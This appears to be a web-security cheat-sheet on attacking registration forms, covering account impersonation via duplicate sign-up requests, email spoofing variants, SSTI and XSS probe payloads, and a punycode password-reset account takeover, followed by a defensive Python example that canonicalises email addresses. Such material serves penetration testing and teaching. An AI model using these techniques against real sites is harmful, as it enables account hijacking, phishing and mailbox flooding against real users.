Registration Form
Registration Form Exploit
Business Logic
Try to register with the email example@target.com. Sometimes these accounts have special privileges, such as no rate limiting, and bypass certain verifications.
Impersonation
Register twice using the same data but changing the sign-up component.
The victim’s account could be hijacked if the application allows resetting the password based on one of the sign-up components.
POST /newaccount HTTP/1.1
...
email=victim@mail.com&password=1234
After signing up with the victim's email, try to sign up again using a different password:
POST /newaccount HTTP/1.1
...
email=victim@mail.com&password=hacked
The attacker may impersonate the victim by using his data from another account.
The victim’s data can be removed entirely from the database or replaced with new ones entered by the attacker.
Username and other sensitive data such as document number, phone number, personal identification number, International Bank Account Number, etc., must be linked to the existing account and blocked from being used again.
Spoofing
Register twice using the same email with one of these variations: + | . | uppercase | unicode.
The attacker could smuggle messages to the victim based on the registration form, which could help in a phishing campaign.
A victim’s mailbox can be flooded with vast amounts of email messages. As a result, the mail server can place messages from the target domain in the spam folder or block them entirely from delivery.
An attacker could get registration bonuses multiple times.
SSTI
In name field:
"{{7*7}}<img>
"">{{7*7}}<img>"
XSS
{{constructor.constructor('alert(`XSS`)')()}}
Punycode Attack
Create an account and append your collaborator domain at the end to receive the SMTP callback:
admin@wearehackerone.com.collaborator.com
Sign up again using punycode:
admin@weàrehackerone.com.collaborator.com
Burp automatically encodes the punycode, so intercept the request and change the email field manually.

"Email already exists" -> The app is vulnerable
Forgot password: reset the password with the punycode email address. Again, intercept the request and change the email field to the punycode address.
You should get an SMTP callback with the reset password link. Reset the password.
Login again with the original email and the new password
Source: https://www.youtube.com/watch?v=Cj1sOFHDClM
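On the defending side, the Spoofing variants (+, ., uppercase, unicode) and the punycode lookalike above are all closed by the same control: one canonical key for sign-up and reset lookups, with the reset mail sent to the stored address. The following is an added example, not code from this page or its source; the Registry class, the dot-insensitive domain list and the policy choices marked in comments are assumptions.

```python
import unicodedata

# Assumption: domains whose mailboxes ignore dots in the local part.
DOT_INSENSITIVE = {"gmail.com", "googlemail.com"}


class RejectedEmail(ValueError):
    """Raised for an address the sign-up form should refuse."""


def canonical_email(raw: str) -> str:
    """Key for the uniqueness check; the same key is used for reset lookups."""
    addr = unicodedata.normalize("NFKC", raw.strip())  # fold fullwidth etc.
    local, sep, domain = addr.rpartition("@")
    if not sep or not local or not domain:
        raise RejectedEmail("not an address")
    # Policy assumption: refuse non-ASCII local parts rather than let a
    # database collation decide that "à" equals "a".
    if not local.isascii():
        raise RejectedEmail("non-ASCII local part")
    try:
        # Store the domain in its IDNA (xn--) form, lowercased, so a
        # lookalike domain never compares equal to the ASCII one.
        domain = domain.encode("idna").decode("ascii").lower()
    except UnicodeError as exc:
        raise RejectedEmail("invalid domain") from exc
    local = local.lower().split("+", 1)[0]  # policy: drop +tag everywhere
    if domain in DOT_INSENSITIVE:
        local = local.replace(".", "")
    if not local:
        raise RejectedEmail("empty local part")
    return f"{local}@{domain}"


class Registry:
    """In-memory stand-in for the users table (hypothetical)."""

    def __init__(self):
        self._stored = {}  # canonical key -> address given at sign-up

    def register(self, email: str) -> bool:
        key = canonical_email(email)
        if key in self._stored:
            return False  # variant of an existing account
        self._stored[key] = email
        return True

    def reset_recipient(self, email: str):
        """Reset mail goes to the stored address, never the submitted one."""
        return self._stored.get(canonical_email(email))
```

In a real schema the canonical key would carry the unique constraint in a binary (accent- and case-sensitive) column, so the database cannot reintroduce the loose comparison.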
Fake Information
OpSec / Anonymity
Username
Phone
Receive SMS
Address